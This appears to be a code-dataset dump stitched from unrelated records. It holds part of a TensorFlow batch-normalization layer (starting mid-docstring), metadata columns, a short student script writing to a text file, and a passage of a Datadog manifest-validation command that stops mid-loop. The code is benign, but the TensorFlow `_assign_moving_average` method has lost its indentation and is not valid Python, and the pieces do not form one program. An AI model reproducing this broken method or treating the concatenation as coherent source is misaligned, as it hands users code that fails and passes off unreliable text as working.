`GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
name: A string, the name of the layer.
"""
  def __init__(self,
               axis=-1,
               momentum=0.99,
               epsilon=1e-3,
               center=True,
               scale=True,
               beta_initializer=init_ops.zeros_initializer(),
               gamma_initializer=init_ops.ones_initializer(),
               moving_mean_initializer=init_ops.zeros_initializer(),
               moving_variance_initializer=init_ops.ones_initializer(),
               beta_regularizer=None,
               gamma_regularizer=None,
               beta_constraint=None,
               gamma_constraint=None,
               renorm=False,
               renorm_clipping=None,
               renorm_momentum=0.99,
               fused=None,
               trainable=True,
               name=None,
               **kwargs):
    """Stores configuration; see the class docstring for argument semantics.

    No variables are created here -- that happens lazily in `build()`.
    """
    super(BatchNormalization, self).__init__(
        name=name, trainable=trainable, **kwargs)
    self.axis = axis
    self.momentum = momentum
    self.epsilon = epsilon
    self.center = center
    self.scale = scale
    self.beta_initializer = beta_initializer
    self.gamma_initializer = gamma_initializer
    self.moving_mean_initializer = moving_mean_initializer
    self.moving_variance_initializer = moving_variance_initializer
    self.beta_regularizer = beta_regularizer
    self.gamma_regularizer = gamma_regularizer
    self.beta_constraint = beta_constraint
    self.gamma_constraint = gamma_constraint
    self.renorm = renorm
    # This environment variable is only used during the testing period of fused
    # batch norm and will be removed after that.
    if fused is None:
      fused = _FUSED_DEFAULT

    self.fused = fused
    # Test-only escape hatch; when False, _fused_batch_norm strips Bessel's
    # correction from the fused kernel's variance.
    self._bessels_correction_test_only = True

    if renorm:
      # Validate the clipping dict eagerly so bad keys fail at construction
      # time rather than deep inside build()/call().
      renorm_clipping = renorm_clipping or {}
      keys = ['rmax', 'rmin', 'dmax']
      if set(renorm_clipping) - set(keys):
        raise ValueError('renorm_clipping %s contains keys not in %s' %
                         (renorm_clipping, keys))
      self.renorm_clipping = renorm_clipping
      self.renorm_momentum = renorm_momentum
  def build(self, input_shape):
    """Creates the layer variables (gamma/beta, moving stats, renorm state).

    Also decides here -- once the input rank is known -- whether the fused
    implementation can actually be used, and normalizes `self.axis` for
    negative values.

    Raises:
      ValueError: if the input rank or the `axis` dimension is undefined,
        or if `axis` is out of range for the input rank.
    """
    input_shape = tensor_shape.TensorShape(input_shape)
    if not input_shape.ndims:
      raise ValueError('Input has undefined rank:', input_shape)
    ndim = len(input_shape)
    # Resolve a negative axis to its positive equivalent.
    if self.axis < 0:
      axis = ndim + self.axis
    else:
      axis = self.axis
    if axis < 0 or axis >= ndim:
      raise ValueError('Value of `axis` argument ' + str(self.axis) +
                       ' is out of range for input with rank ' + str(ndim))

    if self.fused:
      # Currently fused batch norm doesn't support renorm and beta/gamma
      # regularizer; and only supports an input tensor of rank 4 and a channel
      # dimension on axis 1 and 3.
      # TODO(yaozhang): if input is not 4D, reshape it to 4D and reshape the
      # output back to its original shape accordingly.
      self.fused = not self.renorm and ndim == 4 and axis in [
          1, 3
      ] and self.beta_regularizer is None and self.gamma_regularizer is None

    if self.fused:
      if axis == 1:
        self._data_format = 'NCHW'
      else:
        self._data_format = 'NHWC'

    param_dim = input_shape[axis]
    if not param_dim.value:
      raise ValueError('Input has undefined `axis` dimension. Input shape: ',
                       input_shape)
    self.input_spec = base.InputSpec(ndim=ndim,
                                     axes={self.axis: param_dim.value})

    if self.scale:
      self.gamma = self.add_variable(name='gamma',
                                     shape=(param_dim,),
                                     initializer=self.gamma_initializer,
                                     regularizer=self.gamma_regularizer,
                                     constraint=self.gamma_constraint,
                                     trainable=True)
    else:
      self.gamma = None
      if self.fused:
        # Fused kernel requires a gamma tensor even when scaling is disabled.
        self._gamma_const = array_ops.constant(1.0, shape=(param_dim,))

    if self.center:
      self.beta = self.add_variable(name='beta',
                                    shape=(param_dim,),
                                    initializer=self.beta_initializer,
                                    regularizer=self.beta_regularizer,
                                    constraint=self.beta_constraint,
                                    trainable=True)
    else:
      self.beta = None
      if self.fused:
        # Fused kernel requires a beta tensor even when centering is disabled.
        self._beta_const = array_ops.constant(0.0, shape=(param_dim,))

    # Disable variable partitioning when creating the moving mean and variance
    try:
      if self._scope:
        partitioner = self._scope.partitioner
        self._scope.set_partitioner(None)
      else:
        partitioner = None
      self.moving_mean = self.add_variable(
          name='moving_mean',
          shape=(param_dim,),
          initializer=self.moving_mean_initializer,
          trainable=False)

      self.moving_variance = self.add_variable(
          name='moving_variance',
          shape=(param_dim,),
          initializer=self.moving_variance_initializer,
          trainable=False)

      # Precomputed complement of the decay, used by _assign_moving_average.
      self._one_minus_decay = 1.0 - self.momentum
      if self.renorm:
        # Create variables to maintain the moving mean and standard deviation.
        # These are used in training and thus are different from the moving
        # averages above. The renorm variables are colocated with moving_mean
        # and moving_variance.
        # NOTE: below, the outer `with device` block causes the current device
        # stack to be cleared. The nested ones use a `lambda` to set the desired
        # device and ignore any devices that may be set by the custom getter.
        def _renorm_variable(name, shape):
          # Helper: zero-initialized, non-trainable renorm state variable.
          var = self.add_variable(name=name,
                                  shape=shape,
                                  initializer=init_ops.zeros_initializer(),
                                  trainable=False)
          return var

        with ops.device(None):
          device = ((lambda _: self.moving_mean.device)
                    if context.in_graph_mode() else self.moving_mean.device)
          with ops.device(device):
            self.renorm_mean = _renorm_variable('renorm_mean', (param_dim,))
            self.renorm_mean_weight = _renorm_variable('renorm_mean_weight', ())
          # We initialize renorm_stddev to 0, and maintain the (0-initialized)
          # renorm_stddev_weight. This allows us to (1) mix the average
          # stddev with the minibatch stddev early in training, and (2) compute
          # the unbiased average stddev by dividing renorm_stddev by the weight.
          device = ((lambda _: self.moving_variance.device)
                    if context.in_graph_mode() else self.moving_variance.device)
          with ops.device(device):
            self.renorm_stddev = _renorm_variable('renorm_stddev', (param_dim,))
            self.renorm_stddev_weight = _renorm_variable(
                'renorm_stddev_weight', ())
    finally:
      # Always restore the scope's original partitioner, even on error.
      if partitioner:
        self._scope.set_partitioner(partitioner)
    self.built = True
def _assign_moving_average(self, variable, value, one_minus_decay):
with ops.name_scope(None, 'AssignMovingAvg',
[variable, value, one_minus_decay]) as scope:
with ops.colocate_with(variable):
update_delta = (variable.read_value() - value) * one_minus_decay
if isinstance(variable, resource_variable_ops.ResourceVariable):
# state_ops.assign_sub does an extra read_variable_op after the
# assign. We avoid that here.
return gen_resource_variable_ops.assign_sub_variable_op(
variable.handle, update_delta, name=scope)
else:
return state_ops.assign_sub(variable, update_delta, name=scope)
  def _fused_batch_norm(self, inputs, training):
    """Returns the output of fused batch norm.

    Uses the training-mode kernel (batch statistics) or the inference-mode
    kernel (moving statistics) depending on `training`, then updates the
    moving mean/variance when training (or when `training` is dynamic).
    """
    # When center/scale are disabled, fall back to the constant 0/1 tensors
    # created in build() -- the fused kernel always needs beta/gamma inputs.
    beta = self.beta if self.center else self._beta_const
    gamma = self.gamma if self.scale else self._gamma_const

    def _fused_batch_norm_training():
      # Training path: normalize with the current batch's statistics.
      return nn.fused_batch_norm(
          inputs,
          gamma,
          beta,
          epsilon=self.epsilon,
          data_format=self._data_format)

    def _fused_batch_norm_inference():
      # Inference path: normalize with the accumulated moving statistics.
      return nn.fused_batch_norm(
          inputs,
          gamma,
          beta,
          mean=self.moving_mean,
          variance=self.moving_variance,
          epsilon=self.epsilon,
          is_training=False,
          data_format=self._data_format)

    output, mean, variance = utils.smart_cond(
        training, _fused_batch_norm_training, _fused_batch_norm_inference)

    if not self._bessels_correction_test_only:
      # Remove Bessel's correction to be consistent with non-fused batch norm.
      # Note that the variance computed by fused batch norm is
      # with Bessel's correction.
      sample_size = math_ops.cast(
          array_ops.size(inputs) / array_ops.size(variance), variance.dtype)
      factor = (sample_size - math_ops.cast(1.0, variance.dtype)) / sample_size
      variance *= factor

    training_value = utils.constant_value(training)
    if training_value is None:
      # `training` is a dynamic tensor: pick the decay complement at runtime
      # (0. means "no update" on the inference branch).
      one_minus_decay = _smart_select(training,
                                      lambda: self._one_minus_decay,
                                      lambda: 0.)
    else:
      one_minus_decay = self._one_minus_decay
    if training_value or training_value is None:
      mean_update = self._assign_moving_average(self.moving_mean, mean,
                                                one_minus_decay)
      variance_update = self._assign_moving_average(self.moving_variance,
                                                    variance, one_minus_decay)
      if context.in_graph_mode():
        # Note that in Eager mode, the updates are already executed when running
        # assign_moving_averages. So we do not need to put them into
        # collections.
        self.add_update(mean_update, inputs=inputs)
        self.add_update(variance_update, inputs=inputs)

    return output
  def _renorm_correction_and_moments(self, mean, variance, training):
    """Returns the correction and update values for renorm.

    Returns a tuple (r, d, new_mean, new_variance) where the corrected
    normalized value is `normalized * r + d`, and new_mean/new_variance are
    the unbiased renorm moving averages after this batch's update.
    """
    stddev = math_ops.sqrt(variance + self.epsilon)
    # Compute the average mean and standard deviation, as if they were
    # initialized with this batch's moments.
    mixed_renorm_mean = (self.renorm_mean +
                         (1. - self.renorm_mean_weight) * mean)
    mixed_renorm_stddev = (self.renorm_stddev +
                           (1. - self.renorm_stddev_weight) * stddev)
    # Compute the corrections for batch renorm.
    r = stddev / mixed_renorm_stddev
    d = (mean - mixed_renorm_mean) / mixed_renorm_stddev
    # Ensure the corrections use pre-update moving averages.
    with ops.control_dependencies([r, d]):
      mean = array_ops.identity(mean)
      stddev = array_ops.identity(stddev)
    # Clip r into [rmin, rmax] and d into [-dmax, dmax]; missing keys mean
    # the corresponding bound is not applied.
    rmin, rmax, dmax = [self.renorm_clipping.get(key)
                        for key in ['rmin', 'rmax', 'dmax']]
    if rmin is not None:
      r = math_ops.maximum(r, rmin)
    if rmax is not None:
      r = math_ops.minimum(r, rmax)
    if dmax is not None:
      d = math_ops.maximum(d, -dmax)
      d = math_ops.minimum(d, dmax)
    # When not training, use r=1, d=0, and decay=1 meaning no updates.
    r = _smart_select(training, lambda: r, lambda: array_ops.ones_like(r))
    d = _smart_select(training, lambda: d, lambda: array_ops.zeros_like(d))
    decay = _smart_select(training, lambda: self.renorm_momentum, lambda: 1.)

    def _update_renorm_variable(var, weight, value):
      """Updates a moving average and weight, returns the unbiased value."""
      # Update the variables without zero debiasing. The debiasing will be
      # accomplished by dividing the exponential moving average by the weight.
      # For example, after a single update, the moving average would be
      # (1-decay) * value. and the weight will be 1-decay, with their ratio
      # giving value.
      # Make sure the weight is not updated until before r and d computation.
      value = array_ops.identity(value)
      with ops.control_dependencies([value]):
        weight_value = array_ops.constant(1., dtype=weight.dtype)
        new_var = moving_averages.assign_moving_average(
            var, value, decay, zero_debias=False)
        new_weight = moving_averages.assign_moving_average(
            weight, weight_value, decay, zero_debias=False)
        return new_var / new_weight

    with ops.colocate_with(self.moving_mean):
      new_mean = _update_renorm_variable(self.renorm_mean,
                                         self.renorm_mean_weight,
                                         mean)
    with ops.colocate_with(self.moving_variance):
      new_stddev = _update_renorm_variable(self.renorm_stddev,
                                           self.renorm_stddev_weight,
                                           stddev)
      # Make sqrt(moving_variance + epsilon) = new_stddev.
      new_variance = math_ops.square(new_stddev) - self.epsilon

    return (r, d, new_mean, new_variance)
  def call(self, inputs, training=False):
    """Applies batch normalization to `inputs`.

    Args:
      inputs: Input tensor.
      training: Either a Python boolean or a scalar boolean `Tensor`;
        selects batch statistics (True) vs. moving statistics (False).
        May be unknown at graph-construction time (e.g. a placeholder).

    Returns:
      The normalized tensor, same shape as `inputs`.
    """
    # Delegate to the fused kernel when enabled.
    if self.fused:
      return self._fused_batch_norm(inputs, training=training)
    # First, compute the axes along which to reduce the mean / variance,
    # as well as the broadcast shape to be used for all parameters.
    input_shape = inputs.get_shape()
    ndim = len(input_shape)
    reduction_axes = list(range(len(input_shape)))
    del reduction_axes[self.axis]
    broadcast_shape = [1] * len(input_shape)
    broadcast_shape[self.axis] = input_shape[self.axis].value
    # Determines whether broadcasting is needed.
    needs_broadcasting = (sorted(reduction_axes) != list(range(ndim))[:-1])
    scale, offset = self.gamma, self.beta
    # Determine a boolean value for `training`: could be True, False, or None.
    training_value = utils.constant_value(training)
    if training_value is not False:
      # Some of the computations here are not necessary when training==False
      # but not a constant. However, this makes the code simpler.
      mean, variance = nn.moments(inputs, reduction_axes)
      mean = _smart_select(training,
                           lambda: mean,
                           lambda: self.moving_mean)
      variance = _smart_select(training,
                               lambda: variance,
                               lambda: self.moving_variance)
      if self.renorm:
        r, d, new_mean, new_variance = self._renorm_correction_and_moments(
            mean, variance, training)
        # When training, the normalized values (say, x) will be transformed as
        # x * gamma + beta without renorm, and (x * r + d) * gamma + beta
        # = x * (r * gamma) + (d * gamma + beta) with renorm.
        scale = array_ops.stop_gradient(r, name='renorm_r')
        offset = array_ops.stop_gradient(d, name='renorm_d')
        if self.gamma is not None:
          scale *= self.gamma
          offset *= self.gamma
        if self.beta is not None:
          offset += self.beta
      else:
        new_mean, new_variance = mean, variance
      # Update moving averages when training, and prevent updates otherwise.
      decay = _smart_select(training, lambda: self.momentum, lambda: 1.)
      mean_update = moving_averages.assign_moving_average(
          self.moving_mean, new_mean, decay, zero_debias=False)
      variance_update = moving_averages.assign_moving_average(
          self.moving_variance, new_variance, decay, zero_debias=False)
      if context.in_graph_mode():
        # In graph mode the update ops are collected (UPDATE_OPS) so callers
        # can add them as train_op dependencies.
        self.add_update(mean_update, inputs=inputs)
        self.add_update(variance_update, inputs=inputs)
    else:
      # Statically known inference mode: use the moving statistics directly.
      mean, variance = self.moving_mean, self.moving_variance
    def _broadcast(v):
      # Reshape parameters to the broadcast shape when reduction axes are
      # not the canonical leading axes (e.g. channels-first layouts).
      if needs_broadcasting and v is not None:
        # In this case we must explicitly broadcast all parameters.
        return array_ops.reshape(v, broadcast_shape)
      return v
    return nn.batch_normalization(inputs,
                                  _broadcast(mean),
                                  _broadcast(variance),
                                  _broadcast(offset),
                                  _broadcast(scale),
                                  self.epsilon)
def batch_normalization(inputs,
                        axis=-1,
                        momentum=0.99,
                        epsilon=1e-3,
                        center=True,
                        scale=True,
                        beta_initializer=init_ops.zeros_initializer(),
                        gamma_initializer=init_ops.ones_initializer(),
                        moving_mean_initializer=init_ops.zeros_initializer(),
                        moving_variance_initializer=init_ops.ones_initializer(),
                        beta_regularizer=None,
                        gamma_regularizer=None,
                        beta_constraint=None,
                        gamma_constraint=None,
                        training=False,
                        trainable=True,
                        name=None,
                        reuse=None,
                        renorm=False,
                        renorm_clipping=None,
                        renorm_momentum=0.99,
                        fused=None):
  """Functional interface for the batch normalization layer.

  Reference: http://arxiv.org/abs/1502.03167
  "Batch Normalization: Accelerating Deep Network Training by Reducing
  Internal Covariate Shift", Sergey Ioffe, Christian Szegedy.

  This is a thin wrapper: it instantiates a `BatchNormalization` layer with
  the given configuration and applies it to `inputs`.

  Note: when training, the moving_mean and moving_variance need to be updated.
  By default the update ops are placed in `tf.GraphKeys.UPDATE_OPS`, so they
  need to be added as a dependency to the `train_op`. For example:

  ```python
    update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
    with tf.control_dependencies(update_ops):
      train_op = optimizer.minimize(loss)
  ```

  Arguments:
    inputs: Tensor input.
    axis: Integer, the axis to normalize (typically the features axis), e.g.
      `axis=1` after a `Convolution2D` with `data_format="channels_first"`.
    momentum: Momentum for the moving average.
    epsilon: Small float added to variance to avoid dividing by zero.
    center: If True, add offset of `beta` to the normalized tensor.
    scale: If True, multiply by `gamma`; can be disabled when the next layer
      is linear (also e.g. `nn.relu`) since it can do the scaling itself.
    beta_initializer: Initializer for the beta weight.
    gamma_initializer: Initializer for the gamma weight.
    moving_mean_initializer: Initializer for the moving mean.
    moving_variance_initializer: Initializer for the moving variance.
    beta_regularizer: Optional regularizer for the beta weight.
    gamma_regularizer: Optional regularizer for the gamma weight.
    beta_constraint: Optional projection function applied to `beta` after an
      `Optimizer` update (not safe with asynchronous distributed training).
    gamma_constraint: Optional projection function applied to `gamma` after
      an `Optimizer` update.
    training: Either a Python boolean, or a TensorFlow boolean scalar tensor
      (e.g. a placeholder). Whether to return the output in training mode
      (normalized with statistics of the current batch) or in inference mode
      (normalized with moving statistics). **NOTE**: make sure to set this
      parameter correctly, or else your training/inference will not work.
    trainable: Boolean, if `True` also add variables to the graph collection
      `GraphKeys.TRAINABLE_VARIABLES` (see tf.Variable).
    name: String, the name of the layer.
    reuse: Boolean, whether to reuse the weights of a previous layer by the
      same name.
    renorm: Whether to use Batch Renormalization
      (https://arxiv.org/abs/1702.03275). Adds extra variables during
      training; inference is the same for either value.
    renorm_clipping: Optional dict mapping 'rmax', 'rmin', 'dmax' to scalar
      `Tensors` that clip the renorm correction `(r, d)` used as
      `corrected_value = normalized_value * r + d`; `r` is clipped to
      [rmin, rmax] and `d` to [-dmax, dmax] (defaults inf, 0, inf).
    renorm_momentum: Momentum used to update the moving means and standard
      deviations with renorm; unlike `momentum` it affects training and
      should be neither too small (noisy) nor too large (stale). `momentum`
      is still applied to get the inference statistics.
    fused: if `True`, use a faster, fused implementation if possible.
      If `None`, use the system recommended implementation.

  Returns:
    Output tensor.
  """
  # Collect the layer configuration, then construct and apply in one step.
  layer_config = dict(
      axis=axis,
      momentum=momentum,
      epsilon=epsilon,
      center=center,
      scale=scale,
      beta_initializer=beta_initializer,
      gamma_initializer=gamma_initializer,
      moving_mean_initializer=moving_mean_initializer,
      moving_variance_initializer=moving_variance_initializer,
      beta_regularizer=beta_regularizer,
      gamma_regularizer=gamma_regularizer,
      beta_constraint=beta_constraint,
      gamma_constraint=gamma_constraint,
      renorm=renorm,
      renorm_clipping=renorm_clipping,
      renorm_momentum=renorm_momentum,
      fused=fused,
      trainable=trainable,
      name=name,
      _reuse=reuse,
      _scope=name,
  )
  return BatchNormalization(**layer_config).apply(inputs, training=training)
# Aliases
# Backwards-compatible shorthand names for the layer class and the
# functional interface.
BatchNorm = BatchNormalization
batch_norm = batch_normalization
# Helper function
def _smart_select(pred, fn_then, fn_else):
  """Selects fn_then() or fn_else() based on the value of pred.

  Serves the same purpose as `utils.smart_cond`, but sidesteps a bug
  (b/36297356) that appears when `smart_cond` delegates to `tf.cond`,
  which can hang training under parameter servers. If `pred` is known at
  graph construction time, the chosen branch is returned directly.
  Otherwise both branches are computed and `tf.where` selects one; the
  redundant work is cheap because the tensors involved (batchnorm means
  and variances) are small, and no cost is paid when `pred` is constant.

  Args:
    pred: A boolean scalar `Tensor`.
    fn_then: A callable to use when pred==True.
    fn_else: A callable to use when pred==False.

  Returns:
    A `Tensor` whose value is fn_then() or fn_else() based on the value of
    pred.
  """
  static_pred = utils.constant_value(pred)
  # Statically-known predicate: return the chosen branch directly.
  if static_pred:
    return fn_then()
  if static_pred is False:
    return fn_else()
  # Runtime predicate: evaluate both branches and pick one with tf.where.
  branch_then = array_ops.expand_dims(fn_then(), 0)
  branch_else = array_ops.expand_dims(fn_else(), 0)
  selector = array_ops.reshape(pred, [1])
  picked = array_ops.where(selector, branch_then, branch_else)
  return array_ops.squeeze(picked, [0])
| 45.14172
| 80
| 0.660164
|
4a0f21e5a9a84c62da0796c0c2c45d7aa67d8f7f
| 190
|
py
|
Python
|
Lab 07/Lab07.01-quiz-b.py
|
eoinlees/Labsheets2020
|
8c4df8cb10d17978602cea8bafec21e89fca3cb9
|
[
"MIT"
] | null | null | null |
Lab 07/Lab07.01-quiz-b.py
|
eoinlees/Labsheets2020
|
8c4df8cb10d17978602cea8bafec21e89fca3cb9
|
[
"MIT"
] | null | null | null |
Lab 07/Lab07.01-quiz-b.py
|
eoinlees/Labsheets2020
|
8c4df8cb10d17978602cea8bafec21e89fca3cb9
|
[
"MIT"
] | null | null | null |
#Eoin Lees
# Writes a line to "test b.txt" and prints the value returned by
# file.write, which is the number of characters written.
with open("test b.txt", "w") as f:
    data = f.write("test b\n")
    print (data)
# NOTE(review): mode "w" truncates the file, so this second write replaces
# "test b\n" instead of adding to it — if the intent was to append
# "another line 8" after the first line, the mode should be "a". Left
# unchanged since this is quiz output and may be deliberate.
with open("test b.txt", "w") as f2:
    data = f2.write("another line 8\n")
    print (data)
| 17.272727
| 39
| 0.563158
|
4a0f2231e97995291bf7da0ac5102cd1f20c9670
| 26,991
|
py
|
Python
|
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/manifest.py
|
lindleywhite/integrations-core
|
97021c770a5a9661596a0f19265d1828f54d9717
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/manifest.py
|
lindleywhite/integrations-core
|
97021c770a5a9661596a0f19265d1828f54d9717
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_dev/datadog_checks/dev/tooling/commands/validate/manifest.py
|
lindleywhite/integrations-core
|
97021c770a5a9661596a0f19265d1828f54d9717
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import json
import os
import uuid
import click
import jsonschema
from ....fs import file_exists, read_file, write_file
from ...constants import get_root
from ...git import content_changed
from ...utils import get_metadata_file, parse_version_parts, read_metadata_rows
from ..console import CONTEXT_SETTINGS, abort, echo_failure, echo_info, echo_success, echo_warning
# Manifest attributes whose values must never change once published; the
# `manifest` command flags any diff that touches them.
FIELDS_NOT_ALLOWED_TO_CHANGE = ["integration_id", "display_name", "guid"]

# `metric_to_check` values that are exempt from the requirement of being
# listed in the check's metadata.csv.
METRIC_TO_CHECK_WHITELIST = {
    'openstack.controller',  # "Artificial" metric, shouldn't be listed in metadata file.
    'riakcs.bucket_list_pool.workers',  # RiakCS 2.1 metric, but metadata.csv lists RiakCS 2.0 metrics only.
}
def get_manifest_schema():
    """Returns a Draft-7 `jsonschema` validator for integration manifest.json files.

    The schema declares the attributes of a manifest and, through `allOf`
    conditionals, applies support-type-specific rules: `core` manifests must
    use the Datadog maintainer address and may not carry `author`/`pricing`/
    `terms`; `partner` manifests must provide all three, with per-billing-type
    pricing constraints.
    """
    return jsonschema.Draft7Validator(
        {
            "$schema": "http://json-schema.org/draft-07/schema#",
            "title": "Integration Manifest Schema",
            "description": "Defines the various components of an integration",
            "type": "object",
            "properties": {
                "display_name": {
                    "description": "The human readable name of this integration",
                    "type": "string",
                    "minLength": 1,
                },
                "maintainer": {
                    "description": "The email address for the maintainer of this integration",
                    "type": "string",
                    "format": "email",
                },
                "manifest_version": {"description": "The schema version of this manifest", "type": "string"},
                "name": {"description": "The name of this integration", "type": "string", "minLength": 1},
                "metric_prefix": {
                    "description": "The prefix for metrics being emitted from this integration",
                    "type": "string",
                },
                "metric_to_check": {
                    "description": "The metric to use to determine the health of this integration",
                    "oneOf": [{"type": "string"}, {"type": "array", "items": {"type": "string"}}],
                },
                "creates_events": {"description": "Whether or not this integration emits events", "type": "boolean"},
                "short_description": {
                    "description": "Brief description of this integration",
                    "type": "string",
                    "minLength": 1,
                    "maxLength": 80,
                },
                "guid": {"description": "A GUID for this integration", "type": "string", "minLength": 1},
                "support": {
                    "description": "The support type for this integration, one of `core`, `contrib`, or `partner`",
                    "type": "string",
                    "enum": ["core", "contrib", "partner"],
                },
                "supported_os": {
                    "description": "The supported Operating Systems for this integration",
                    "type": "array",
                    "items": {"type": "string", "enum": ["linux", "mac_os", "windows"]},
                },
                "public_title": {
                    "description": "A human readable public title of this integration",
                    "type": "string",
                    "minLength": 1,
                },
                "categories": {
                    "description": "The categories of this integration",
                    "type": "array",
                    "items": {"type": "string"},
                },
                "type": {"description": "The type of this integration", "type": "string", "enum": ["check", "crawler"]},
                "is_public": {"description": "Whether or not this integration is public", "type": "boolean"},
                "integration_id": {
                    "description": "The string identifier for this integration",
                    "type": "string",
                    "pattern": "^[a-z][a-z0-9-]{0,254}(?<!-)$",
                },
                "assets": {
                    "description": "An object containing the assets for an integration",
                    "type": "object",
                    "properties": {
                        "monitors": {"type": "object"},
                        "dashboards": {"type": "object"},
                        "service_checks": {
                            "type": "string",
                            "description": "Relative path to the json file containing service check metadata",
                        },
                        "metrics_metadata": {
                            "type": "string",
                            "description": "Relative path to the metrics metadata.csv file.",
                        },
                        "logs": {
                            "type": "object",
                            "properties": {
                                "source": {
                                    "type": "string",
                                    "description": "The log pipeline identifier corresponding to this integration",
                                }
                            },
                        },
                    },
                    "required": ["monitors", "dashboards", "service_checks"],
                },
            },
            # Support-type-specific rules applied conditionally.
            "allOf": [
                {
                    "if": {"properties": {"support": {"const": "core"}}},
                    "then": {
                        "properties": {"maintainer": {"pattern": "help@datadoghq.com"}},
                        "not": {
                            "anyOf": [{"required": ["author"]}, {"required": ["pricing"]}, {"required": ["terms"]}]
                        },
                    },
                },
                {
                    "if": {"properties": {"support": {"const": "contrib"}}},
                    "then": {"properties": {"maintainer": {"pattern": ".*"}}},
                },
                {
                    "if": {"properties": {"support": {"const": "partner"}}},
                    "then": {
                        "properties": {
                            "maintainer": {"pattern": ".*"},
                            "author": {
                                "description": "Information about the integration's author",
                                "type": "object",
                                "properties": {
                                    "name": {
                                        "description": "The name of the company that owns this integration",
                                        "type": "string",
                                    },
                                    "homepage": {
                                        "type": "string",
                                        "description": "The homepage of the company/product for this integration",
                                    },
                                },
                            },
                            "pricing": {
                                "description": "Available pricing options",
                                "type": "array",
                                "minItems": 1,
                                "items": {
                                    "description": "Attributes of pricing plans available for this integration",
                                    "type": "object",
                                    "properties": {
                                        "billing_type": {
                                            "description": "The billing model for this integration",
                                            "type": "string",
                                            "enum": ["flat_fee", "free", "one_time", "tag_count"],
                                        },
                                        "unit_price": {
                                            "description": "The price per unit for this integration",
                                            "type": "number",
                                        },
                                        "unit_label": {
                                            "description": "The friendly, human readable, description of the tag",
                                            "type": "string",
                                        },
                                        "metric": {"description": "The metric to use for metering", "type": "string"},
                                        "tag": {
                                            "description": ("The tag to use to count the number of billable units"),
                                            "type": "string",
                                        },
                                    },
                                    # Per-billing-type field requirements/exclusions.
                                    "allOf": [
                                        {
                                            "if": {"properties": {"billing_type": {"const": "tag_count"}}},
                                            "then": {"required": ["unit_price", "unit_label", "metric", "tag"]},
                                        },
                                        {
                                            "if": {"properties": {"billing_type": {"const": "free"}}},
                                            "then": {
                                                "not": {
                                                    "anyOf": [
                                                        {"required": ["unit_label"]},
                                                        {"required": ["metric"]},
                                                        {"required": ["tag"]},
                                                        {"required": ["unit_price"]},
                                                    ]
                                                }
                                            },
                                        },
                                        {
                                            "if": {"properties": {"billing_type": {"pattern": "flat_fee|one_time"}}},
                                            "then": {
                                                "not": {
                                                    "anyOf": [
                                                        {"required": ["unit_label"]},
                                                        {"required": ["metric"]},
                                                        {"required": ["tag"]},
                                                    ]
                                                },
                                                "required": ["unit_price"],
                                            },
                                        },
                                    ],
                                },
                            },
                            "terms": {
                                "description": "Attributes about terms for an integration",
                                "type": "object",
                                "properties": {
                                    "eula": {
                                        "description": "A link to a PDF file containing the EULA for this integration",
                                        "type": "string",
                                    },
                                    "legal_email": {
                                        "description": "Email of the partner company to use for subscription purposes",
                                        "type": "string",
                                        "format": "email",
                                        "minLength": 1,
                                    },
                                },
                                "required": ["eula", "legal_email"],
                            },
                        },
                        "required": ["author", "pricing", "terms"],
                    },
                },
            ],
            "required": [
                # Make metric_to_check and metric_prefix mandatory when all integration are fixed
                'assets',
                'categories',
                'creates_events',
                'display_name',
                'guid',
                'integration_id',
                'is_public',
                'maintainer',
                'manifest_version',
                'name',
                'public_title',
                'short_description',
                'support',
                'supported_os',
                'type',
            ],
        }
    )
def is_metric_in_metadata_file(metric, check):
    """
    Check whether `metric` appears in the given check's `metadata.csv`.

    Returns False when the metadata file does not exist or does not list
    the metric, True otherwise.
    """
    metadata_file = get_metadata_file(check)
    if not os.path.isfile(metadata_file):
        return False
    return any(row['metric_name'] == metric for _, row in read_metadata_rows(metadata_file))
@click.command(context_settings=CONTEXT_SETTINGS, short_help='Validate `manifest.json` files')
@click.option('--fix', is_flag=True, help='Attempt to fix errors')
@click.pass_context
def manifest(ctx, fix):
    """Validate `manifest.json` files.

    Walks every check directory under the repo root, validating each
    manifest against the JSON schema plus repo-specific rules: guid
    uniqueness, manifest_version shape, maintainer, name, metadata.csv
    cross-references, metric_to_check, support level, is_public, and
    immutability of protected fields. With --fix, fixable problems are
    repaired in place and the file rewritten; remaining failures are
    reported and the command aborts.
    """
    # Maps guid -> check name, to detect duplicate guids across checks.
    all_guids = {}
    root = get_root()
    is_extras = ctx.obj['repo_choice'] == 'extras'
    is_marketplace = ctx.obj['repo_choice'] == 'marketplace'
    ok_checks = 0
    failed_checks = 0
    fixed_checks = 0
    echo_info("Validating all manifest.json files...")
    for check_name in sorted(os.listdir(root)):
        manifest_file = os.path.join(root, check_name, 'manifest.json')
        if file_exists(manifest_file):
            # Failure messages are queued and only printed if the file ends
            # up invalid (or fully fixed).
            display_queue = []
            file_failures = 0
            file_fixed = False
            try:
                decoded = json.loads(read_file(manifest_file).strip())
            except json.JSONDecodeError as e:
                failed_checks += 1
                echo_info(f"{check_name}/manifest.json... ", nl=False)
                echo_failure("FAILED")
                echo_failure(f' invalid json: {e}')
                continue
            # attributes are valid
            errors = sorted(get_manifest_schema().iter_errors(decoded), key=lambda e: e.path)
            if errors:
                file_failures += 1
                for error in errors:
                    display_queue.append(
                        (echo_failure, f' {"->".join(map(str, error.absolute_path))} Error: {error.message}')
                    )
            # guid
            guid = decoded.get('guid')
            if guid in all_guids:
                file_failures += 1
                output = f' duplicate `guid`: `{guid}` from `{all_guids[guid]}`'
                if fix:
                    new_guid = uuid.uuid4()
                    all_guids[new_guid] = check_name
                    decoded['guid'] = new_guid
                    display_queue.append((echo_warning, output))
                    display_queue.append((echo_success, f' new `guid`: {new_guid}'))
                    file_failures -= 1
                    file_fixed = True
                else:
                    display_queue.append((echo_failure, output))
            elif not guid or not isinstance(guid, str):
                file_failures += 1
                output = ' required non-null string: guid'
                if fix:
                    new_guid = uuid.uuid4()
                    all_guids[new_guid] = check_name
                    decoded['guid'] = new_guid
                    display_queue.append((echo_warning, output))
                    display_queue.append((echo_success, f' new `guid`: {new_guid}'))
                    file_failures -= 1
